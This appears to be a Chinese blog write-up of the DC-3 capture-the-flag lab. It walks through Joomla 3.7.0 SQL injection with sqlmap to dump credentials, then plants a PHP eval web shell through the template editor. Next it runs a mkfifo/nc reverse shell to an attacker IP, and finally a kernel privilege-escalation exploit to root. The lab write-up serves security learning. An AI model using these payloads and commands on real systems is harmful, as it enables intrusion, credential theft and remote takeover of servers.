DC--3

于 2022-12-26 09:56:06 发布
阅读量133 收藏
点赞数
分类专栏: DC系列 文章标签: 信息安全 网络安全 渗透测试 nmap DC系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/128440528
版权

信息收集

确定目标主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221215091208822

扫描IP开放端口

masscan 192.168.84.178 --rate=10000 --ports 0-65535

image-20221215091428710

使用浏览器访问80端口

image-20221215091631959

通过插件获取到相关信息

image-20221215091741977

该网站由joomlaCMS搭建

利用joomscan工具进行扫描

joomscan -h

image-20221215091937759

扫描该网站

joomscan -u http://192.168.84.178/

image-20221215092237913

获取到相关版本号和路径

查找是否有历史漏洞

searchsploit Joomla 3.7.0
searchsploit -m 42033.txt    // m 为下载到当前路径

image-20221215092613823

查看42033.txt

image-20221215092754118

得到payload

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

只需将localhost替换为目标地址即可

sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

web测试

sqlmap

库名

sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image-20221215093108603

表名

sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb --tables

image-20221215093217068

字段名

sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb -T "#__users" --columns

image-20221215093541736

获取username、password字段数据

sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb -T "#__users" -C username,password --dump

image-20221215093621602

对password进行解密

image-20221215094143643

得到user的账户名与密码为admin、snoopy

网站后台进行登录

image-20221215094235944

存在网站模板

image-20221215094718439

可以新建文件 - new file

在html目录下新建shell.php文件

image-20221215095146997

写入内容

<?php eval($_REQUEST[1])?>

点击save进行保存

目录泄露

image-20221215095650854

访问shell.php 并传参

image-20221215095726679

蚁剑连接

http://192.168.84.178/templates/beez3/html/shell.php?1=phpinfo();

image-20221215114936892

提权

提权分为系统提权和应用提权

本次用的是系统提权

查看当前系统发行版本

cat /etc/*release

image-20221215133559532

搜索历史漏洞

searchsploit ubuntu 16.04

image-20221215162333373

searchsploit -m 39772

将对应的文档下载到当前目录

cat 39772.txt

image-20221215162510733

点击连接进行下载

image-20221215162421529

写入反弹shell

将shell.php中的一句话木马修改为反弹shell的木马

image-20221215162748589

<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.84.174 10086 >/tmp/f');
?>

本地开启监听端口

nc -lvnp 10086

浏览器访问shell.php文件

http://192.168.84.179/templates/beez3/html/shell.php

image-20221215162947048

靶机传送文件

由于在同一网络环境下, 开启http服务,用于传输文件

image-20221215163053102

image-20221215163101275

靶机中用wget进行下载文件

image-20221215163141685

解压文件

unzip 33992.zip

image-20221215163239961

进入39772目录,解压exploit文件

image-20221215163355348

进入ebpf_mapfd_doubleput_exploit目标,编译运行

image-20221215163539468

拿到最终的flag

image-20221215163604116

小白学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-3超声操作手册
03-25
DC-3超声操作手册 DC-3/DC-3T Diagnostic Ultrasound System Operator’s Manual
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
dc-sdk-examples:DC-SDK开发示例
05-11
"DC-SDK开发示例"是一个专门为开发者设计的项目,旨在帮助他们更好地理解和使用DC-SDK进行3D可视化开发。DC-SDK(可能是"Data Center SDK"或类似的缩写)是一个强大的工具集,用于构建基于Web的三维场景,特别是在...
simulink仿真-PFC、DC-DC
04-12
在电力电子领域,Simulink被广泛用于设计和仿真各种电源转换系统,如PFC(功率因数校正)和DC-DC转换器。本文将深入探讨标题和描述中涉及的"simulink仿真-PFC、DC-DC"的相关知识点。 首先,我们来看功率因数校正...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
webgoat-server-8.2.2.zip
07-21
解压即可得到webgoat-server-8.2.2.jar
人工智能行业深度报告:WAIC2024,国产AI+应用“百花齐放”
07-21
2024年世界人工智能大会(WAIC 2024)上,国产AI+应用生态呈现“百花齐放”的局面 1. WAIC 2024:国产 AI+应用生态“百花齐放” 多家厂商携大模型及AI应用成果亮相展会,涵盖金山办公、科大讯飞、华为、商汤等知名企业。 OpenAI 禁令加速推动国产 AI 生态,国产大模型性能持续提升,缩小与海外差距。 预计未来国产 AI+行业应用将迎来“百花齐放”局面,商业空间加速打开。 2. 国产大模型加速迭代,代表性厂商生态加速构建 科大讯飞 发布星火 V4.0 大模型,全面对标 GPT-4 Turbo,多模态能力显著提升。 星火医疗和教育垂类模型能力升级,赋能行业应用落地。 推出星火企业智能平台,赋能企业构建岗位专属助手。 华为 发布盘古大模型 5.0 系列,包括不同参数规模,适用于多种场景。 推出盘古具身智能大模型,推动人形机器人技术升级。 盘古 5.0 赋能华为小艺升级,在多个行业落地应用。 商汤 发布“日日新 5.5”模型,交互体验对标 GPT-4o,多模态能力实现突破。 推出面向 C 端用户的可控人物视频生成模型 Vimi。 率先实现原生多模态大模型车端部署
java毕设&课设-基于web的实验室管理系统(自动排课功能的实现).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
丽珠集团000513.SZ公司首次覆盖报告:创新药与高壁垒制剂齐推进,多元化布局促发展.pdf
07-21
丽珠集团000513.SZ公司首次覆盖报告:创新药与高壁垒制剂齐推进,多元化布局促发展
线性预测房屋价格加清洗评估加分析-项目实战5-分析房屋价格数据-ipynb格式-Python语法-用Jupyter打开
07-21
线性预测房屋价格加清洗评估加分析-项目实战5-分析房屋价格数据-ipynb格式-Python语法-用Jupyter notebook打开 用来练习多元线性回归及预测和清洗评估和分析,整个流程特别清晰,每个步骤均用Makedown编辑器进行编辑文字,每一步都给出了清晰的代码以及压缩包中给出了相应的数据集,可以按照步骤一步一步进行模仿,理解其中的思维逻辑,然后上手进行操作,在操作的过程中不断思考,等能力有了很大提升之后,就可以慢慢独立思考从事项目了 最后祝您变得更强
骨科高值耗材:全面集采后,如何看骨科赛道投资机会?.pdf
07-21
骨科高值耗材:全面集采后,如何看骨科赛道投资机会?
mingw+cmake+QT的GeographicLib库
07-21
mingw+cmake+QT的GeographicLib库
高级语言程序设计大作业C++基于Qt编写的俄罗斯方块游戏源代码+实验报告,面向对象
07-21
高级语言程序设计大作业C++基于Qt编写的俄罗斯方块游戏源代码+实验报告,面向对象 开发软件 Qtcreator12.04
pythom剧情游戏.zip
最新发布
07-21
pythom剧情游戏
AI人工智能行业调研研究报告 苹果公司发布首份人工智能报告,AI视觉是研究新方向 共37页.pdf
07-21
AI人工智能行业调研研究报告 苹果公司发布首份人工智能报告,AI视觉是研究新方向 共37页
机动目标跟踪的自适应卡尔曼滤波算法实现.zip
07-21
机动目标跟踪的自适应卡尔曼滤波算法实现.zip
深入Java NIO:释放IO性能的新维度
07-21
Java是一种广泛使用的编程语言,由Sun Microsystems公司(现属于Oracle公司)在1995年首次发布。它是一种面向对象的语言,意味着它将现实世界中的事物抽象为对象,这些对象具有属性(数据)和方法(行为)。Java语言设计目标包括跨平台性、网络编程能力、健壮性、安全性和简单性。 ### Java的主要特点: 1. **跨平台性**:Java的口号是“一次编写,到处运行”(Write Once, Run Anywhere,简称WORA)。这得益于Java的运行时环境,即Java虚拟机(JVM),它允许Java程序在任何安装了JVM的平台上运行,而不需要重新编译。 2. **面向对象**:Java是一种面向对象的语言,支持封装、继承和多态等特性。 3. **健壮性**:Java设计时注重安全性和错误处理,例如通过强类型检查和异常处理机制。 4. **多线程**:Java内置了对多线程编程的支持,允许开发者创建同时执行的多个线程。 5. **网络编程**:Java提供了丰富的网络通信API,使得开发网络应用变得容易。 6. **安全性**:Java提供了一个安全
MySQL安装-在centos7下安装mysql服务mariadb版本
07-21
MySQL安装-在centos7下安装mysql服务mariadb版本

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值